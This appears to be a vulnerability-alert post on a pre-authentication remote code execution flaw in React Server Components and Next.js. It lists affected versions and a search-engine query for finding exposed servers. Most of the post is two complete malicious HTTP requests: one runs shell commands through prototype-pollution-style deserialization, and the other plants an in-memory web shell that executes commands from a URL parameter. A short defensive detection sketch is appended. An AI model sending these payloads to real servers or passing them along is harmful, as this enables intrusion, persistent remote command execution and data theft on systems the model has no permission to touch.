[Vulnerability Alert] Critical Remote Code Execution Vulnerability in React and Next.js (CV...

    Posted 5 days ago
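    React Server Components versions 19.0.0, 19.1.0, 19.1.1 and 19.2.0 contain a pre-authentication remote code execution vulnerability. The affected packages are react-server-dom-parcel, react-server-dom-turbopack and react-server-dom-webpack. The vulnerable code unsafely deserializes the payload of HTTP requests sent to Server Function endpoints. After several days of research, the chain can currently be triggered unconditionally on the Next.js server side (when the App Router is used)! Research also found that Dify can be affected, with a high success rate.

    Affected React versions: React 19.0.0, React 19.1.0, React 19.1.1, React 19.2.0

    Affected Next.js versions: applications that use React Server Components and the App Router are affected in the following versions: the Next.js 15.x series (all versions), the Next.js 16.x series (all versions), and Next.js 14.3.0-canary.77 and later canary releases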


    fofa:app="Next.js" && body="/_next/static/chunks/app/"


    POC:


    POST /apps HTTP/1.1
    Host: xxxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Assetnote/1.0.0
    Next-Action: x
    X-Nextjs-Request-Id: 7a3f9c1e
    X-Nextjs-Html-Request-Id: 9bK2mPqRtVwXyZ3$@!sT7u
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Connection: close
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Content-Length: 581

    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"

    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"

    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="2"

    []
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--





    In-memory web shell


    POST / HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
    Next-Action: x
    X-Nextjs-Request-Id: b5dce965
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
    Content-Length: 565
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"

    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="2"
    []
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    Usage: /exec?cmd=id

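A defensive triage sketch for the request shape shown in the two payloads above, as an added example that is not part of the original post: it flags raw requests that carry a Next-Action header together with the `__proto__` or `constructor:constructor` reference strings, or a client-supplied `_response` key. The function names and sample requests are constructed, and the markers are heuristics taken from this page's payloads, not a complete signature.

```javascript
// Added example, not from the original post: heuristic triage of raw HTTP
// requests for marker strings visible in the two payloads on this page.
const MARKERS = [
  { name: 'proto-ref', re: /\$\d+:__proto__:/ },             // "$1:__proto__:then"
  { name: 'ctor-ref', re: /\$\d+:constructor:constructor/ }, // path to Function
  { name: 'client-response', re: /"_response"\s*:/ },        // internal field sent by client
];

// JSON \uXXXX escapes can hide a marker from a plain pattern match,
// so decode them before matching.
function decodeEscapes(text) {
  return text.replace(/\\u([0-9a-fA-F]{4})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Returns { serverAction, hits, verdict } for one raw request.
// The whole request text is scanned, so a missing blank line between
// headers and body does not hide the markers.
function inspectRequest(raw) {
  const serverAction = /^POST\s/.test(raw) && /^next-action\s*:/im.test(raw);
  const text = decodeEscapes(raw);
  const hits = MARKERS.filter((m) => m.re.test(text)).map((m) => m.name);
  let verdict = 'allow';
  if (hits.length > 0) verdict = serverAction ? 'block' : 'review';
  return { serverAction, hits, verdict };
}

// Constructed sample requests (markers only, no executable payload).
const head = [
  'POST /apps HTTP/1.1', 'Host: app.example', 'Next-Action: x',
  'Content-Type: multipart/form-data; boundary=----b', '',
  '------b', 'Content-Disposition: form-data; name="0"', '',
].join('\r\n') + '\r\n';
const tail = '\r\n------b--\r\n';
const SAMPLES = {
  benign: head + '["hello",{"id":"$1:items:0"}]' + tail,
  marked: head + '{"then":"$1:__proto__:then","_response":{"_formData":' +
    '{"get":"$1:constructor:constructor"}}}' + tail,
  escaped: head + '{"then":"$1:\\u005f\\u005fproto__:then"}' + tail,
  noHeader: (head + '{"then":"$1:__proto__:then"}' + tail)
    .replace('Next-Action: x\r\n', ''),
};

for (const [name, raw] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(inspectRequest(raw)));
}
```

A payload encoded in some other way would not match these patterns, so an `allow` verdict is not evidence that a request is harmless.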